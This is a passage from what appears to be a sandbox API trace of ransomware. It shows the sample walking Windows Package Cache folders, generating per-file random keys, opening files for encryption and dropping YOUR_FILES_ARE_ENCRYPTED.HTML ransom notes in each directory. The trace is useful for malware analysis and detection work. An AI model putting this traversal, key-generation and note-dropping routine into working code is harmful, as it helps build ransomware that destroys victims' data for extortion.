lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, 
ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.607] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.607] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35bcbe50, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35bcbe50, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0157.607] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86") returned 116 [0157.607] GetProcessHeap () returned 0x270000 [0157.607] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.610] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package 
Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86" [0157.610] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*" [0157.610] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35bcbe50, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35bcbe50, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.610] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35bcbe50, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35bcbe50, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.610] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x1b027600, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x1b027600, ftLastAccessTime.dwHighDateTime=0x1d5c5bb, ftLastWriteTime.dwLowDateTime=0x1b027600, ftLastWriteTime.dwHighDateTime=0x1d5c5bb, nFileSizeHigh=0x0, nFileSizeLow=0x4f83ae, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0157.610] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 125 [0157.610] lstrcmpW (lpString1="cab1.cab", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.611] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0157.611] lstrlenW (lpString=".cab") returned 4 [0157.611] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0157.611] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0157.611] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x4a8 [0157.611] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=5211054) returned 1 [0157.611] GetProcessHeap () returned 0x270000 [0157.611] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0157.617] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="4A") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="70") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd732, 
param_2="%02X" | out: param_1="09") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="18") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="01") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="A5") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="FA") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="E5") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="3A") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="76") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="4E") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="3F") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="FF") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="87") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="3A") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="F7") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="E0") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="2A") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="1A") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="E8") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="FD") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="8D") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="04") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="0E") returned 2 [0157.618] wsprintfW 
(in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="D2") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="D6") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="35") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="34") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="40") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="8E") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="A3") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="43") returned 2 [0157.619] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0157.619] CreateIoCompletionPort (FileHandle=0x4a8, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0157.619] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0157.625] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4be2ab00, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x4be2ab00, ftLastAccessTime.dwHighDateTime=0x1d5c5bb, ftLastWriteTime.dwLowDateTime=0x4be2ab00, ftLastWriteTime.dwHighDateTime=0x1d5c5bb, nFileSizeHigh=0x0, nFileSizeLow=0x2d000, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0157.625] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 145 [0157.627] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.627] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0157.627] lstrlenW (lpString=".msi") returned 4 [0157.627] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0157.627] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4be2ab00, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x4be2ab00, ftLastAccessTime.dwHighDateTime=0x1d5c5bb, ftLastWriteTime.dwLowDateTime=0x4be2ab00, ftLastWriteTime.dwHighDateTime=0x1d5c5bb, nFileSizeHigh=0x0, nFileSizeLow=0x2d000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0157.627] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.628] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0157.996] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0157.997] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.999] CloseHandle (hObject=0x4a8) returned 1 [0157.999] GetProcessHeap () returned 0x270000 [0158.000] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0158.005] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35bcbe50, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35bcbe50, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0158.005] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0158.006] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0158.006] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0158.006] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, 
lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0158.008] CloseHandle (hObject=0x598) returned 1 [0158.008] GetProcessHeap () returned 0x270000 [0158.009] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0158.010] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 0 [0158.010] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0158.010] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0158.010] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0158.011] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0158.013] CloseHandle (hObject=0x58c) returned 1 [0158.013] GetProcessHeap () returned 0x270000 [0158.014] HeapFree (in: 
hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0158.014] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17987c30, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179add90, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179add90, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", cAlternateFileName="{13A4E~1.210")) returned 1 [0158.014] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned 82 [0158.014] GetProcessHeap () returned 0x270000 [0158.014] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0158.014] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" [0158.014] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*" [0158.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17987c30, ftCreationTime.dwHighDateTime=0x1d706a6, 
ftLastAccessTime.dwLowDateTime=0x179add90, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179add90, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0158.015] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17987c30, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179add90, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179add90, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.015] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179add90, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179add90, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0158.015] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned 91 [0158.015] GetProcessHeap () returned 0x270000 [0158.015] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0158.015] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned="\\\\?\\C:\\ProgramData\\Package 
Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" [0158.015] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*" [0158.015] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179add90, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179add90, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0158.015] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179add90, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179add90, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.015] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0158.015] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned 112 [0158.015] GetProcessHeap () returned 0x270000 [0158.016] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0158.018] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" [0158.018] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*" [0158.018] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", 
cAlternateFileName="")) returned 0x42f31c0 [0158.018] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.018] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0b40d00, ftCreationTime.dwHighDateTime=0x1cf3e1e, 